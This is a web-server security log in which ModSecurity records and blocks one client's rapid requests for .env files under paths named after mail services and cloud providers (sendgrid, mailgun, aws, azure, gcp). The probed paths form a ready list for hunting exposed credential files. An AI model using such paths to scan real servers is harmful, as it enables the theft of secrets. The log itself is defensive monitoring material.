[Mon May 11 17:33:52.291622 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/sendgrid/.env"] [unique_id "agH24Py_GXSWIKeli0sMVAAAAI8"]
[Mon May 11 17:33:52.291847 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/sendgrid/.env"] [unique_id "agH24Py_GXSWIKeli0sMVAAAAI8"]
[Mon May 11 17:33:52.292071 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24Py_GXSWIKeli0sMVAAAAI8"]
[Mon May 11 17:33:52.591035 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/sparkpost/.env"] [unique_id "agH24Py_GXSWIKeli0sMVQAAAI8"]
[Mon May 11 17:33:52.591340 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/sparkpost/.env"] [unique_id "agH24Py_GXSWIKeli0sMVQAAAI8"]
[Mon May 11 17:33:52.591636 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24Py_GXSWIKeli0sMVQAAAI8"]
[Mon May 11 17:33:52.703504 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/postmark/.env"] [unique_id "agH24Py_GXSWIKeli0sMVgAAAI8"]
[Mon May 11 17:33:52.703674 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/postmark/.env"] [unique_id "agH24Py_GXSWIKeli0sMVgAAAI8"]
[Mon May 11 17:33:52.703892 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24Py_GXSWIKeli0sMVgAAAI8"]
[Mon May 11 17:33:52.851644 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/mailgun/.env"] [unique_id "agH24Py_GXSWIKeli0sMXQAAAI8"]
[Mon May 11 17:33:52.851920 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/mailgun/.env"] [unique_id "agH24Py_GXSWIKeli0sMXQAAAI8"]
[Mon May 11 17:33:52.852304 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24Py_GXSWIKeli0sMXQAAAI8"]
[Mon May 11 17:33:52.965496 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/mandrill/.env"] [unique_id "agH24Py_GXSWIKeli0sMXgAAAI8"]
[Mon May 11 17:33:52.965735 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/mandrill/.env"] [unique_id "agH24Py_GXSWIKeli0sMXgAAAI8"]
[Mon May 11 17:33:52.965962 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24Py_GXSWIKeli0sMXgAAAI8"]
[Mon May 11 17:33:53.353758 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/mailjet/.env"] [unique_id "agH24fy_GXSWIKeli0sMXwAAAI8"]
[Mon May 11 17:33:53.354001 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/mailjet/.env"] [unique_id "agH24fy_GXSWIKeli0sMXwAAAI8"]
[Mon May 11 17:33:53.354227 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24fy_GXSWIKeli0sMXwAAAI8"]
[Mon May 11 17:33:53.590450 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/brevo/.env"] [unique_id "agH24fy_GXSWIKeli0sMYAAAAI8"]
[Mon May 11 17:33:53.590775 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/brevo/.env"] [unique_id "agH24fy_GXSWIKeli0sMYAAAAI8"]
[Mon May 11 17:33:53.591079 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24fy_GXSWIKeli0sMYAAAAI8"]
[Mon May 11 17:33:53.703577 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/transactional/.env"] [unique_id "agH24fy_GXSWIKeli0sMYQAAAI8"]
[Mon May 11 17:33:53.703838 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/transactional/.env"] [unique_id "agH24fy_GXSWIKeli0sMYQAAAI8"]
[Mon May 11 17:33:53.704107 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24fy_GXSWIKeli0sMYQAAAI8"]
[Mon May 11 17:33:53.825392 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/bulk/.env"] [unique_id "agH24fy_GXSWIKeli0sMYwAAAI8"]
[Mon May 11 17:33:53.825628 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/bulk/.env"] [unique_id "agH24fy_GXSWIKeli0sMYwAAAI8"]
[Mon May 11 17:33:53.825884 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24fy_GXSWIKeli0sMYwAAAI8"]
[Mon May 11 17:33:53.937760 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/aws/.env"] [unique_id "agH24fy_GXSWIKeli0sMZgAAAI8"]
[Mon May 11 17:33:53.937993 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/aws/.env"] [unique_id "agH24fy_GXSWIKeli0sMZgAAAI8"]
[Mon May 11 17:33:53.938250 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24fy_GXSWIKeli0sMZgAAAI8"]
[Mon May 11 17:33:54.175421 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/azure/.env"] [unique_id "agH24vy_GXSWIKeli0sMZwAAAI8"]
[Mon May 11 17:33:54.175596 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/azure/.env"] [unique_id "agH24vy_GXSWIKeli0sMZwAAAI8"]
[Mon May 11 17:33:54.179121 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24vy_GXSWIKeli0sMZwAAAI8"]
[Mon May 11 17:33:54.287222 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/gcp/.env"] [unique_id "agH24vy_GXSWIKeli0sMaAAAAI8"]
[Mon May 11 17:33:54.287444 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/gcp/.env"] [unique_id "agH24vy_GXSWIKeli0sMaAAAAI8"]
[Mon May 11 17:33:54.287654 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24vy_GXSWIKeli0sMaAAAAI8"]
[Mon May 11 17:33:54.399585 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/cloud/.env"] [unique_id "agH24vy_GXSWIKeli0sMaQAAAI8"]
[Mon May 11 17:33:54.399813 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/cloud/.env"] [unique_id "agH24vy_GXSWIKeli0sMaQAAAI8"]
[Mon May 11 17:33:54.400039 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH24vy_GXSWIKeli0sMaQAAAI8"]
[Mon May 11 17:33:54.513751 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/infrastructure/.env"] [unique_id "agH24vy_GXSWIKeli0sMagAAAI8"]
